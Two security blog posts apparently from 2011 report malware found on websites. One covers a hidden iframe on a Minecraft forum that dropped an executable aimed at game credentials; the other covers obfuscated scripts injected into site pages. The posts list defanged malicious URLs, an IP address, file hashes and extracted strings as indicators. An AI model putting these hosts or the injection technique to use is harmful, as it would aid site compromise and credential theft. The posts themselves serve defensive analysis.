Tag Archives: hidden iframe

Hidden Iframe in MineCraftForum.Net

Users have reported us another website infected by an hidden iframe:

hxxp://www.minecraftforum.net/

All web pages are affected!

Here is an image of the hidden iframe at the bottom of the HTML pages:

Image

When I visted the infected website, NoVirusThanks EXE Radar Pro has displayed an alert of an unknown executable that tried to run in the system:

C:\Documents and Settings\User\Local Settings\Temp\scvhost.exe

Report date: 2011-06-22 11:34:41 (GMT 1)
File name: scvhost-exe
File size: 18944 bytes
MD5 hash: 5e71723d34d10648ed880af8e564f63b
SHA1 hash: 1af3dcb235e0a16eb58cebdbc0b9fb6316dc2f3b
Detection rate: 0 on 5 (0%)
Status: CLEAN

Thanks to NoVirusThanks EXE Radar Pro, I was able to block and delete the unknown and malicious executable file, preventing the system from being infected.

Some ASCII strings extracted from the PE file:

Type: ASCII
RVA: 00006CE2
Offset: 000040E2
Size: 0000000D
Value: GuardCore.dll
 
Type: ASCII
RVA: 00006EBC
Offset: 000042BC
Size: 00000024
Value: hxxp://www.dashangu.com/new/getw.asp
 
Type: ASCII
RVA: 00006EFF
Offset: 000042FF
Size: 00000006
Value: server
 
Type: ASCII
RVA: 00006F14
Offset: 00004314
Size: 0000000E
Value: WTF\Config.wtf
 
Type: ASCII
RVA: 00006F24
Offset: 00004324
Size: 0000000A
Value: realmName 
 
Type: ASCII
RVA: 00006F35
Offset: 00004335
Size: 00000005
Value: Right
 
Type: ASCII
RVA: 00006F4C
Offset: 0000434C
Size: 00000024
Value: hxxp://www.dashangu.com/new/getr.asp
 
Type: ASCII
RVA: 00006F74
Offset: 00004374
Size: 00000011
Value: JAGEXLAUNCHER.EXE
 
Type: ASCII
RVA: 00006F88
Offset: 00004388
Size: 00000007
Value: WOW.EXn
 
Type: ASCII
RVA: 00006F90
Offset: 00004390
Size: 00000007
Value: WinInet

URLVoid domain analysis:

http://www.urlvoid.com/scan/minecraftforum.net

16:38PM UPDATE:

The website looks like to be in maintenance now, so probably it will be fixed soon.

Website infected with malicious scripts

I was browsing websites analyzed by internal honeypots and I found a website that is infected with two malicious scripts. I used website snifer to retrieve the content of the website and we can see from the pic above that after the end of the html tag there are two javascript scripts:

Image

This is very suspicious since there should never be scripts or iframes at the end of the html tag and this looks like that the website has been infected with an automatic script that adds specific code (in this case js code + iframe) at the end of each files present in a website. Most probably also other websites present in the same server where is hosted the infected website could have the same dangerous scripts injected in all of their files, this is a common symptom of a mass infection.

We can see that the first script contains obfuscated data and it uses random function names to bypass heuristic detections of security software. When deobfuscated, we can see it points to the following malicious url:

Image

Interesting, it is an iframe that can be called hidden since it uses the two parameters width and height with a very small value (1) to hide the iframe from the user. A scan with IPVoid.com reveals that the IP Address is detected by 5 engines and it is classified as dangerous: 79.135.152.181

The other script is not deobfuscated and we can see that it loads a script from a remote website that looks a bit suspicious since it uses port 8080 for its web server:

1
hxxp://oployau.fancountblogger. com:8080/Undo.js

A scan with URLVoid.com reveals that the website is detected by 5 engines and it is classified as dangerous: oployau.fancountblogger.com